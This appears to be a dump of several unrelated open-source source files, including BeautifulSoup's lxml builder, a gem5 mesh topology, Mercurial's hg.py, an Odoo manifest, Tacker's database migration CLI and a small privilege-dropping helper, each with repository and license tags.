inverted_nsmap = dict((value, key) for key, value in list(nsmap.items()))
self.nsmaps.append(inverted_nsmap)
# Also treat the namespace mapping as a set of attributes on the
# tag, so we can recreate it later.
attrs = attrs.copy()
for prefix, namespace in list(nsmap.items()):
attribute = NamespacedAttribute(
"xmlns", prefix, "http://www.w3.org/2000/xmlns/")
attrs[attribute] = namespace
# Namespaces are in play. Find any attributes that came in
# from lxml with namespaces attached to their names, and
# turn them into NamespacedAttribute objects.
new_attrs = {}
for attr, value in list(attrs.items()):
namespace, attr = self._getNsTag(attr)
if namespace is None:
new_attrs[attr] = value
else:
nsprefix = self._prefix_for_namespace(namespace)
attr = NamespacedAttribute(nsprefix, attr, namespace)
new_attrs[attr] = value
attrs = new_attrs
namespace, name = self._getNsTag(name)
nsprefix = self._prefix_for_namespace(namespace)
self.soup.handle_starttag(name, namespace, nsprefix, attrs)
def _prefix_for_namespace(self, namespace):
"""Find the currently active prefix for the given namespace."""
if namespace is None:
return None
for inverted_nsmap in reversed(self.nsmaps):
if inverted_nsmap is not None and namespace in inverted_nsmap:
return inverted_nsmap[namespace]
return None
def end(self, name):
self.soup.endData()
completed_tag = self.soup.tagStack[-1]
namespace, name = self._getNsTag(name)
nsprefix = None
if namespace is not None:
for inverted_nsmap in reversed(self.nsmaps):
if inverted_nsmap is not None and namespace in inverted_nsmap:
nsprefix = inverted_nsmap[namespace]
break
self.soup.handle_endtag(name, nsprefix)
if len(self.nsmaps) > 1:
# This tag, or one of its parents, introduced a namespace
# mapping, so pop it off the stack.
self.nsmaps.pop()
def pi(self, target, data):
self.soup.endData()
self.soup.handle_data(target + ' ' + data)
self.soup.endData(ProcessingInstruction)
def data(self, content):
self.soup.handle_data(content)
def doctype(self, name, pubid, system):
self.soup.endData()
doctype = Doctype.for_name_and_ids(name, pubid, system)
self.soup.object_was_parsed(doctype)
def comment(self, content):
"Handle comments as Comment objects."
self.soup.endData()
self.soup.handle_data(content)
self.soup.endData(Comment)
def test_fragment_to_document(self, fragment):
"""See `TreeBuilder`."""
return '<?xml version="1.0" encoding="utf-8"?>\n%s' % fragment
class LXMLTreeBuilder(HTMLTreeBuilder, LXMLTreeBuilderForXML):
NAME = LXML
ALTERNATE_NAMES = ["lxml-html"]
features = ALTERNATE_NAMES + [NAME, HTML, FAST, PERMISSIVE]
is_xml = False
def default_parser(self, encoding):
return etree.HTMLParser
def feed(self, markup):
encoding = self.soup.original_encoding
try:
self.parser = self.parser_for(encoding)
self.parser.feed(markup)
self.parser.close()
except (UnicodeDecodeError, LookupError, etree.ParserError) as e:
raise ParserRejectedMarkup(str(e))
def test_fragment_to_document(self, fragment):
"""See `TreeBuilder`."""
return '<html><body>%s</body></html>' % fragment
| lgpl-2.1 |
lixt/lily2-gem5 | configs/topologies/MeshDirCorners.py | 15 | 6049 | # Copyright (c) 2010 Advanced Micro Devices, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Brad Beckmann
from m5.params import *
from m5.objects import *
from BaseTopology import SimpleTopology
class MeshDirCorners(SimpleTopology):
description='MeshDirCorners'
def __init__(self, controllers):
self.nodes = controllers
    # This file contains a special network creation function. This
    # network is not general and will only work with specific system
    # configurations. The network specified is similar to the network
    # specified by GEMS' old file-based configuration.
def makeTopology(self, options, IntLink, ExtLink, Router):
nodes = self.nodes
num_routers = options.num_cpus
num_rows = options.mesh_rows
# First determine which nodes are cache cntrls vs. dirs vs. dma
cache_nodes = []
dir_nodes = []
dma_nodes = []
for node in nodes:
if node.type == 'L1Cache_Controller' or \
node.type == 'L2Cache_Controller':
cache_nodes.append(node)
elif node.type == 'Directory_Controller':
dir_nodes.append(node)
elif node.type == 'DMA_Controller':
dma_nodes.append(node)
        # Obviously the number of rows must be <= the number of routers
# and evenly divisible. Also the number of caches must be a
# multiple of the number of routers and the number of directories
# must be four.
assert(num_rows <= num_routers)
num_columns = int(num_routers / num_rows)
assert(num_columns * num_rows == num_routers)
caches_per_router, remainder = divmod(len(cache_nodes), num_routers)
assert(remainder == 0)
assert(len(dir_nodes) == 4)
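        # As a sketch of the numbering assumed below: routers are laid out
        # row-major, so the router at (row, col) has id
        # row * num_columns + col, and the four corners are ids 0,
        # num_columns - 1, num_routers - num_columns and num_routers - 1.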
# Create the routers in the mesh
routers = [Router(router_id=i) for i in range(num_routers)]
# link counter to set unique link ids
link_count = 0
# Connect each cache controller to the appropriate router
ext_links = []
for (i, n) in enumerate(cache_nodes):
cntrl_level, router_id = divmod(i, num_routers)
assert(cntrl_level < caches_per_router)
ext_links.append(ExtLink(link_id=link_count, ext_node=n,
int_node=routers[router_id]))
link_count += 1
# Connect the dir nodes to the corners.
ext_links.append(ExtLink(link_id=link_count, ext_node=dir_nodes[0],
int_node=routers[0]))
link_count += 1
ext_links.append(ExtLink(link_id=link_count, ext_node=dir_nodes[1],
int_node=routers[num_columns - 1]))
link_count += 1
ext_links.append(ExtLink(link_id=link_count, ext_node=dir_nodes[2],
int_node=routers[num_routers - num_columns]))
link_count += 1
ext_links.append(ExtLink(link_id=link_count, ext_node=dir_nodes[3],
int_node=routers[num_routers - 1]))
link_count += 1
# Connect the dma nodes to router 0. These should only be DMA nodes.
for (i, node) in enumerate(dma_nodes):
assert(node.type == 'DMA_Controller')
            ext_links.append(ExtLink(link_id=link_count, ext_node=node,
                                     int_node=routers[0]))
            link_count += 1
# Create the mesh links. First row (east-west) links then column
# (north-south) links
int_links = []
for row in xrange(num_rows):
for col in xrange(num_columns):
if (col + 1 < num_columns):
east_id = col + (row * num_columns)
west_id = (col + 1) + (row * num_columns)
int_links.append(IntLink(link_id=link_count,
node_a=routers[east_id],
node_b=routers[west_id],
weight=1))
link_count += 1
for col in xrange(num_columns):
for row in xrange(num_rows):
if (row + 1 < num_rows):
north_id = col + (row * num_columns)
south_id = col + ((row + 1) * num_columns)
int_links.append(IntLink(link_id=link_count,
node_a=routers[north_id],
node_b=routers[south_id],
weight=2))
link_count += 1
return routers, int_links, ext_links
| bsd-3-clause |
ingokegel/intellij-community | plugins/hg4idea/testData/bin/mercurial/hg.py | 90 | 21956 | # hg.py - repository classes for mercurial
#
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from i18n import _
from lock import release
from node import hex, nullid
import localrepo, bundlerepo, unionrepo, httppeer, sshpeer, statichttprepo
import bookmarks, lock, util, extensions, error, node, scmutil, phases, url
import cmdutil, discovery
import merge as mergemod
import verify as verifymod
import errno, os, shutil
def _local(path):
path = util.expandpath(util.urllocalpath(path))
return (os.path.isfile(path) and bundlerepo or localrepo)
def addbranchrevs(lrepo, other, branches, revs):
peer = other.peer() # a courtesy to callers using a localrepo for other
hashbranch, branches = branches
if not hashbranch and not branches:
return revs or None, revs and revs[0] or None
revs = revs and list(revs) or []
if not peer.capable('branchmap'):
if branches:
raise util.Abort(_("remote branch lookup not supported"))
revs.append(hashbranch)
return revs, revs[0]
branchmap = peer.branchmap()
def primary(branch):
if branch == '.':
if not lrepo:
raise util.Abort(_("dirstate branch not accessible"))
branch = lrepo.dirstate.branch()
if branch in branchmap:
revs.extend(node.hex(r) for r in reversed(branchmap[branch]))
return True
else:
return False
for branch in branches:
if not primary(branch):
raise error.RepoLookupError(_("unknown branch '%s'") % branch)
if hashbranch:
if not primary(hashbranch):
revs.append(hashbranch)
return revs, revs[0]
def parseurl(path, branches=None):
'''parse url#branch, returning (url, (branch, branches))'''
u = util.url(path)
branch = None
if u.fragment:
branch = u.fragment
u.fragment = None
return str(u), (branch, branches or [])
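# For illustration (hypothetical URL):
#   parseurl('http://example.com/repo#stable')
# returns ('http://example.com/repo', ('stable', [])).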
schemes = {
'bundle': bundlerepo,
'union': unionrepo,
'file': _local,
'http': httppeer,
'https': httppeer,
'ssh': sshpeer,
'static-http': statichttprepo,
}
def _peerlookup(path):
u = util.url(path)
scheme = u.scheme or 'file'
thing = schemes.get(scheme) or schemes['file']
try:
return thing(path)
except TypeError:
return thing
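# Note: most entries in schemes are modules, but 'file' maps to the _local
# callable; calling a module raises TypeError, so the fallback above returns
# the module object itself.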
def islocal(repo):
'''return true if repo or path is local'''
if isinstance(repo, str):
try:
return _peerlookup(repo).islocal(repo)
except AttributeError:
return False
return repo.local()
def openpath(ui, path):
'''open path with open if local, url.open if remote'''
if islocal(path):
return util.posixfile(util.urllocalpath(path), 'rb')
else:
return url.open(ui, path)
def _peerorrepo(ui, path, create=False):
"""return a repository object for the specified path"""
obj = _peerlookup(path).instance(ui, path, create)
ui = getattr(obj, "ui", ui)
for name, module in extensions.extensions():
hook = getattr(module, 'reposetup', None)
if hook:
hook(ui, obj)
return obj
def repository(ui, path='', create=False):
"""return a repository object for the specified path"""
peer = _peerorrepo(ui, path, create)
repo = peer.local()
if not repo:
raise util.Abort(_("repository '%s' is not local") %
(path or peer.url()))
return repo.filtered('visible')
def peer(uiorrepo, opts, path, create=False):
'''return a repository peer for the specified path'''
rui = remoteui(uiorrepo, opts)
return _peerorrepo(rui, path, create).peer()
def defaultdest(source):
'''return default destination of clone if none is given'''
return os.path.basename(os.path.normpath(util.url(source).path or ''))
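# For illustration (hypothetical URL): defaultdest('http://example.com/a/b/')
# normalizes the URL path and returns 'b'.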
def share(ui, source, dest=None, update=True):
'''create a shared repository'''
if not islocal(source):
raise util.Abort(_('can only share local repositories'))
if not dest:
dest = defaultdest(source)
else:
dest = ui.expandpath(dest)
if isinstance(source, str):
origsource = ui.expandpath(source)
source, branches = parseurl(origsource)
srcrepo = repository(ui, source)
rev, checkout = addbranchrevs(srcrepo, srcrepo, branches, None)
else:
srcrepo = source.local()
origsource = source = srcrepo.url()
checkout = None
sharedpath = srcrepo.sharedpath # if our source is already sharing
root = os.path.realpath(dest)
roothg = os.path.join(root, '.hg')
if os.path.exists(roothg):
raise util.Abort(_('destination already exists'))
if not os.path.isdir(root):
os.mkdir(root)
util.makedir(roothg, notindexed=True)
requirements = ''
try:
requirements = srcrepo.opener.read('requires')
except IOError, inst:
if inst.errno != errno.ENOENT:
raise
requirements += 'shared\n'
util.writefile(os.path.join(roothg, 'requires'), requirements)
util.writefile(os.path.join(roothg, 'sharedpath'), sharedpath)
r = repository(ui, root)
default = srcrepo.ui.config('paths', 'default')
if default:
fp = r.opener("hgrc", "w", text=True)
fp.write("[paths]\n")
fp.write("default = %s\n" % default)
fp.close()
if update:
r.ui.status(_("updating working directory\n"))
if update is not True:
checkout = update
for test in (checkout, 'default', 'tip'):
if test is None:
continue
try:
uprev = r.lookup(test)
break
except error.RepoLookupError:
continue
_update(r, uprev)
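# Note: share() above works by recording a 'shared' requirement and writing a
# 'sharedpath' file that points at the source store, so both repositories
# use the same underlying revlog data.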
def copystore(ui, srcrepo, destpath):
'''copy files from store of srcrepo in destpath
returns destlock
'''
destlock = None
try:
hardlink = None
num = 0
srcpublishing = srcrepo.ui.configbool('phases', 'publish', True)
for f in srcrepo.store.copylist():
if srcpublishing and f.endswith('phaseroots'):
continue
src = os.path.join(srcrepo.sharedpath, f)
dst = os.path.join(destpath, f)
dstbase = os.path.dirname(dst)
if dstbase and not os.path.exists(dstbase):
os.mkdir(dstbase)
if os.path.exists(src):
if dst.endswith('data'):
# lock to avoid premature writing to the target
destlock = lock.lock(os.path.join(dstbase, "lock"))
hardlink, n = util.copyfiles(src, dst, hardlink)
num += n
if hardlink:
ui.debug("linked %d files\n" % num)
else:
ui.debug("copied %d files\n" % num)
return destlock
except: # re-raises
release(destlock)
raise
def clone(ui, peeropts, source, dest=None, pull=False, rev=None,
update=True, stream=False, branch=None):
"""Make a copy of an existing repository.
Create a copy of an existing repository in a new directory. The
source and destination are URLs, as passed to the repository
function. Returns a pair of repository peers, the source and
newly created destination.
The location of the source is added to the new repository's
.hg/hgrc file, as the default to be used for future pulls and
pushes.
If an exception is raised, the partly cloned/updated destination
repository will be deleted.
Arguments:
source: repository object or URL
dest: URL of destination repository to create (defaults to base
name of source repository)
pull: always pull from source repository, even in local case
stream: stream raw data uncompressed from repository (fast over
LAN, slow over WAN)
rev: revision to clone up to (implies pull=True)
update: update working directory after clone completes, if
destination is local repository (True means update to default rev,
anything else is treated as a revision)
branch: branches to clone
"""
if isinstance(source, str):
origsource = ui.expandpath(source)
source, branch = parseurl(origsource, branch)
srcpeer = peer(ui, peeropts, source)
else:
srcpeer = source.peer() # in case we were called with a localrepo
branch = (None, branch or [])
origsource = source = srcpeer.url()
rev, checkout = addbranchrevs(srcpeer, srcpeer, branch, rev)
if dest is None:
dest = defaultdest(source)
ui.status(_("destination directory: %s\n") % dest)
else:
dest = ui.expandpath(dest)
dest = util.urllocalpath(dest)
source = util.urllocalpath(source)
if not dest:
raise util.Abort(_("empty destination path is not valid"))
if os.path.exists(dest):
if not os.path.isdir(dest):
raise util.Abort(_("destination '%s' already exists") % dest)
elif os.listdir(dest):
raise util.Abort(_("destination '%s' is not empty") % dest)
srclock = destlock = cleandir = None
srcrepo = srcpeer.local()
try:
abspath = origsource
if islocal(origsource):
abspath = os.path.abspath(util.urllocalpath(origsource))
if islocal(dest):
cleandir = dest
copy = False
if (srcrepo and srcrepo.cancopy() and islocal(dest)
and not phases.hassecret(srcrepo)):
copy = not pull and not rev
if copy:
try:
# we use a lock here because if we race with commit, we
# can end up with extra data in the cloned revlogs that's
# not pointed to by changesets, thus causing verify to
# fail
srclock = srcrepo.lock(wait=False)
except error.LockError:
copy = False
if copy:
srcrepo.hook('preoutgoing', throw=True, source='clone')
hgdir = os.path.realpath(os.path.join(dest, ".hg"))
if not os.path.exists(dest):
os.mkdir(dest)
else:
# only clean up directories we create ourselves
cleandir = hgdir
try:
destpath = hgdir
util.makedir(destpath, notindexed=True)
except OSError, inst:
if inst.errno == errno.EEXIST:
cleandir = None
raise util.Abort(_("destination '%s' already exists")
% dest)
raise
destlock = copystore(ui, srcrepo, destpath)
# Recomputing branch cache might be slow on big repos,
# so just copy it
dstcachedir = os.path.join(destpath, 'cache')
srcbranchcache = srcrepo.sjoin('cache/branchheads')
dstbranchcache = os.path.join(dstcachedir, 'branchheads')
if os.path.exists(srcbranchcache):
if not os.path.exists(dstcachedir):
os.mkdir(dstcachedir)
util.copyfile(srcbranchcache, dstbranchcache)
# we need to re-init the repo after manually copying the data
# into it
destpeer = peer(srcrepo, peeropts, dest)
srcrepo.hook('outgoing', source='clone',
node=node.hex(node.nullid))
else:
try:
destpeer = peer(srcrepo or ui, peeropts, dest, create=True)
# only pass ui when no srcrepo
except OSError, inst:
if inst.errno == errno.EEXIST:
cleandir = None
raise util.Abort(_("destination '%s' already exists")
% dest)
raise
revs = None
if rev:
if not srcpeer.capable('lookup'):
raise util.Abort(_("src repository does not support "
"revision lookup and so doesn't "
"support clone by revision"))
revs = [srcpeer.lookup(r) for r in rev]
checkout = revs[0]
if destpeer.local():
destpeer.local().clone(srcpeer, heads=revs, stream=stream)
elif srcrepo:
srcrepo.push(destpeer, revs=revs)
else:
raise util.Abort(_("clone from remote to remote not supported"))
cleandir = None
# clone all bookmarks except divergent ones
destrepo = destpeer.local()
if destrepo and srcpeer.capable("pushkey"):
rb = srcpeer.listkeys('bookmarks')
marks = destrepo._bookmarks
for k, n in rb.iteritems():
try:
m = destrepo.lookup(n)
marks[k] = m
except error.RepoLookupError:
pass
if rb:
marks.write()
elif srcrepo and destpeer.capable("pushkey"):
for k, n in srcrepo._bookmarks.iteritems():
destpeer.pushkey('bookmarks', k, '', hex(n))
if destrepo:
fp = destrepo.opener("hgrc", "w", text=True)
fp.write("[paths]\n")
u = util.url(abspath)
u.passwd = None
defaulturl = str(u)
fp.write("default = %s\n" % defaulturl)
fp.close()
destrepo.ui.setconfig('paths', 'default', defaulturl)
if update:
if update is not True:
checkout = srcpeer.lookup(update)
uprev = None
status = None
if checkout is not None:
try:
uprev = destrepo.lookup(checkout)
except error.RepoLookupError:
pass
if uprev is None:
try:
uprev = destrepo._bookmarks['@']
update = '@'
bn = destrepo[uprev].branch()
if bn == 'default':
status = _("updating to bookmark @\n")
else:
status = _("updating to bookmark @ on branch %s\n"
% bn)
except KeyError:
try:
uprev = destrepo.branchtip('default')
except error.RepoLookupError:
uprev = destrepo.lookup('tip')
if not status:
bn = destrepo[uprev].branch()
status = _("updating to branch %s\n") % bn
destrepo.ui.status(status)
_update(destrepo, uprev)
if update in destrepo._bookmarks:
bookmarks.setcurrent(destrepo, update)
return srcpeer, destpeer
finally:
release(srclock, destlock)
if cleandir is not None:
shutil.rmtree(cleandir, True)
if srcpeer is not None:
srcpeer.close()
def _showstats(repo, stats):
repo.ui.status(_("%d files updated, %d files merged, "
"%d files removed, %d files unresolved\n") % stats)
def updaterepo(repo, node, overwrite):
"""Update the working directory to node.
    When overwrite is set, changes are clobbered; otherwise they are merged.
    Returns stats (see pydoc mercurial.merge.applyupdates)."""
return mergemod.update(repo, node, False, overwrite, None)
def update(repo, node):
"""update the working directory to node, merging linear changes"""
stats = updaterepo(repo, node, False)
_showstats(repo, stats)
if stats[3]:
repo.ui.status(_("use 'hg resolve' to retry unresolved file merges\n"))
return stats[3] > 0
# naming conflict in clone()
_update = update
def clean(repo, node, show_stats=True):
"""forcibly switch the working directory to node, clobbering changes"""
stats = updaterepo(repo, node, True)
if show_stats:
_showstats(repo, stats)
return stats[3] > 0
def merge(repo, node, force=None, remind=True):
"""Branch merge with node, resolving changes. Return true if any
unresolved conflicts."""
stats = mergemod.update(repo, node, True, force, False)
_showstats(repo, stats)
if stats[3]:
repo.ui.status(_("use 'hg resolve' to retry unresolved file merges "
"or 'hg update -C .' to abandon\n"))
elif remind:
repo.ui.status(_("(branch merge, don't forget to commit)\n"))
return stats[3] > 0
def _incoming(displaychlist, subreporecurse, ui, repo, source,
opts, buffered=False):
"""
Helper for incoming / gincoming.
displaychlist gets called with
(remoterepo, incomingchangesetlist, displayer) parameters,
and is supposed to contain only code that can't be unified.
"""
source, branches = parseurl(ui.expandpath(source), opts.get('branch'))
other = peer(repo, opts, source)
ui.status(_('comparing with %s\n') % util.hidepassword(source))
revs, checkout = addbranchrevs(repo, other, branches, opts.get('rev'))
if revs:
revs = [other.lookup(rev) for rev in revs]
other, chlist, cleanupfn = bundlerepo.getremotechanges(ui, repo, other,
revs, opts["bundle"], opts["force"])
try:
if not chlist:
ui.status(_("no changes found\n"))
return subreporecurse()
displayer = cmdutil.show_changeset(ui, other, opts, buffered)
# XXX once graphlog extension makes it into core,
        # should be replaced by an if graph/else
displaychlist(other, chlist, displayer)
displayer.close()
finally:
cleanupfn()
subreporecurse()
return 0 # exit code is zero since we found incoming changes
def incoming(ui, repo, source, opts):
def subreporecurse():
ret = 1
if opts.get('subrepos'):
ctx = repo[None]
for subpath in sorted(ctx.substate):
sub = ctx.sub(subpath)
ret = min(ret, sub.incoming(ui, source, opts))
return ret
def display(other, chlist, displayer):
limit = cmdutil.loglimit(opts)
if opts.get('newest_first'):
chlist.reverse()
count = 0
for n in chlist:
if limit is not None and count >= limit:
break
parents = [p for p in other.changelog.parents(n) if p != nullid]
if opts.get('no_merges') and len(parents) == 2:
continue
count += 1
displayer.show(other[n])
return _incoming(display, subreporecurse, ui, repo, source, opts)
def _outgoing(ui, repo, dest, opts):
dest = ui.expandpath(dest or 'default-push', dest or 'default')
dest, branches = parseurl(dest, opts.get('branch'))
ui.status(_('comparing with %s\n') % util.hidepassword(dest))
revs, checkout = addbranchrevs(repo, repo, branches, opts.get('rev'))
if revs:
revs = [repo.lookup(rev) for rev in scmutil.revrange(repo, revs)]
other = peer(repo, opts, dest)
outgoing = discovery.findcommonoutgoing(repo.unfiltered(), other, revs,
force=opts.get('force'))
o = outgoing.missing
if not o:
scmutil.nochangesfound(repo.ui, repo, outgoing.excluded)
return None
return o
def outgoing(ui, repo, dest, opts):
def recurse():
ret = 1
if opts.get('subrepos'):
ctx = repo[None]
for subpath in sorted(ctx.substate):
sub = ctx.sub(subpath)
ret = min(ret, sub.outgoing(ui, dest, opts))
return ret
limit = cmdutil.loglimit(opts)
o = _outgoing(ui, repo, dest, opts)
if o is None:
return recurse()
if opts.get('newest_first'):
o.reverse()
displayer = cmdutil.show_changeset(ui, repo, opts)
count = 0
for n in o:
if limit is not None and count >= limit:
break
parents = [p for p in repo.changelog.parents(n) if p != nullid]
if opts.get('no_merges') and len(parents) == 2:
continue
count += 1
displayer.show(repo[n])
displayer.close()
recurse()
return 0 # exit code is zero since we found outgoing changes
def revert(repo, node, choose):
"""revert changes to revision in node without updating dirstate"""
return mergemod.update(repo, node, False, True, choose)[3] > 0
def verify(repo):
"""verify the consistency of a repository"""
return verifymod.verify(repo)
def remoteui(src, opts):
'build a remote ui from ui or repo and opts'
if util.safehasattr(src, 'baseui'): # looks like a repository
dst = src.baseui.copy() # drop repo-specific config
src = src.ui # copy target options from repo
else: # assume it's a global ui object
dst = src.copy() # keep all global options
# copy ssh-specific options
for o in 'ssh', 'remotecmd':
v = opts.get(o) or src.config('ui', o)
if v:
dst.setconfig("ui", o, v)
# copy bundle-specific options
r = src.config('bundle', 'mainreporoot')
if r:
dst.setconfig('bundle', 'mainreporoot', r)
# copy selected local settings to the remote ui
for sect in ('auth', 'hostfingerprints', 'http_proxy'):
for key, val in src.configitems(sect):
dst.setconfig(sect, key, val)
v = src.config('web', 'cacerts')
if v:
dst.setconfig('web', 'cacerts', util.expandpath(v))
return dst
| apache-2.0 |
NeovaHealth/odoo | addons/membership/__openerp__.py | 197 | 2207 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Membership Management',
'version': '0.1',
'category': 'Association',
'description': """
This module allows you to manage all operations related to memberships.
=========================================================================
It supports different kind of members:
--------------------------------------
* Free member
* Associated member (e.g.: a group subscribes to a membership for all subsidiaries)
* Paid members
* Special member prices
It is integrated with sales and accounting to allow you to automatically
invoice and send propositions for membership renewal.
""",
'author': 'OpenERP SA',
'depends': ['base', 'product', 'account'],
'data': [
'security/ir.model.access.csv',
'wizard/membership_invoice_view.xml',
'membership_data.xml',
'membership_view.xml',
'report/report_membership_view.xml',
],
'demo': [
'membership_demo.xml',
'membership_demo.yml'
],
'website': 'https://www.odoo.com/page/community-builder',
'test': ['test/test_membership.yml'],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
stackforge/tacker | tacker/db/migration/cli.py | 2 | 6050 | # Copyright 2012 New Dream Network, LLC (DreamHost)
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from alembic import command as alembic_command
from alembic import config as alembic_config
from alembic import script as alembic_script
from alembic import util as alembic_util
from oslo_config import cfg
from tacker._i18n import _
from tacker.db.migration.models import head # noqa
from tacker.db.migration import purge_tables
HEAD_FILENAME = 'HEAD'
_db_opts = [
cfg.StrOpt('connection',
deprecated_name='sql_connection',
default='',
secret=True,
help=_('URL to database')),
cfg.StrOpt('engine',
default='',
help=_('Database engine')),
]
CONF = cfg.ConfigOpts()
CONF.register_cli_opts(_db_opts, 'database')
def do_alembic_command(config, cmd, *args, **kwargs):
try:
getattr(alembic_command, cmd)(config, *args, **kwargs)
except alembic_util.CommandError as e:
alembic_util.err(str(e))
def do_check_migration(config, cmd):
do_alembic_command(config, 'branches')
validate_head_file(config)
def do_upgrade(config, cmd):
if not CONF.command.revision and not CONF.command.delta:
raise SystemExit(_('You must provide a revision or relative delta'))
    if CONF.command.delta:
        revision = '+%s' % str(CONF.command.delta)
    else:
        revision = CONF.command.revision
do_alembic_command(config, cmd, revision, sql=CONF.command.sql)
def do_stamp(config, cmd):
do_alembic_command(config, cmd,
CONF.command.revision,
sql=CONF.command.sql)
def do_revision(config, cmd):
do_alembic_command(config, cmd,
message=CONF.command.message,
autogenerate=CONF.command.autogenerate,
sql=CONF.command.sql)
update_head_file(config)
def validate_head_file(config):
script = alembic_script.ScriptDirectory.from_config(config)
if len(script.get_heads()) > 1:
alembic_util.err(_('Timeline branches unable to generate timeline'))
head_path = os.path.join(str(script.versions), HEAD_FILENAME)
if (os.path.isfile(head_path) and
open(head_path).read().strip() == script.get_current_head()):
return
else:
alembic_util.err(_('HEAD file does not match migration timeline head'))
def update_head_file(config):
script = alembic_script.ScriptDirectory.from_config(config)
if len(script.get_heads()) > 1:
alembic_util.err(_('Timeline branches unable to generate timeline'))
head_path = os.path.join(str(script.versions), HEAD_FILENAME)
with open(head_path, 'w+') as f:
f.write(script.get_current_head())
def purge_deleted(config, cmd):
"""Remove database records that have been previously soft deleted."""
purge_tables.purge_deleted(config.tacker_config,
CONF.command.resource,
CONF.command.age,
CONF.command.granularity)
def add_command_parsers(subparsers):
for name in ['current', 'history', 'branches']:
parser = subparsers.add_parser(name)
parser.set_defaults(func=do_alembic_command)
parser = subparsers.add_parser('check_migration')
parser.set_defaults(func=do_check_migration)
parser = subparsers.add_parser('upgrade')
parser.add_argument('--delta', type=int)
parser.add_argument('--sql', action='store_true')
parser.add_argument('revision', nargs='?')
parser.set_defaults(func=do_upgrade)
parser = subparsers.add_parser('stamp')
parser.add_argument('--sql', action='store_true')
parser.add_argument('revision')
parser.set_defaults(func=do_stamp)
parser = subparsers.add_parser('revision')
parser.add_argument('-m', '--message')
parser.add_argument('--autogenerate', action='store_true')
parser.add_argument('--sql', action='store_true')
parser.set_defaults(func=do_revision)
parser = subparsers.add_parser('purge_deleted')
parser.set_defaults(func=purge_deleted)
# positional parameter
parser.add_argument(
'resource',
choices=['all', 'events', 'vnf', 'vnfd', 'vims'],
help=_('Resource name for which deleted entries are to be purged.'))
# optional parameter, can be skipped. default='90'
parser.add_argument('-a', '--age', nargs='?', default='90',
help=_('How long to preserve deleted data, '
'defaults to 90'))
# optional parameter, can be skipped. default='days'
parser.add_argument(
'-g', '--granularity', default='days',
choices=['days', 'hours', 'minutes', 'seconds'],
help=_('Granularity to use for age argument, defaults to days.'))
command_opt = cfg.SubCommandOpt('command',
title='Command',
help=_('Available commands'),
handler=add_command_parsers)
CONF.register_cli_opt(command_opt)
def main():
config = alembic_config.Config(
os.path.join(os.path.dirname(__file__), 'alembic.ini')
)
config.set_main_option('script_location',
'tacker.db.migration:alembic_migrations')
# attach the Tacker conf to the Alembic conf
config.tacker_config = CONF
CONF()
# TODO(gongysh) enable logging
CONF.command.func(config, CONF.command.name)
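# For illustration (hypothetical invocations of the console script):
#   tacker-db-manage --config-file /etc/tacker/tacker.conf upgrade head
#   tacker-db-manage --config-file /etc/tacker/tacker.conf purge_deleted vnf -a 30 -g days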
| apache-2.0 |
tumi8/sKnock | common/modules/Platform/LinuxUtils.py | 1 | 1054 | # Copyright (C) 2015-2016 Daniel Sel
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging, os, pwd, grp
LOG = logging.getLogger(__name__)
def dropPrivileges():
user = pwd.getpwnam('nobody')
group = grp.getgrnam('nobody')
os.setgroups([group.gr_gid])
os.setgid(group.gr_gid)
os.setuid(user.pw_uid)
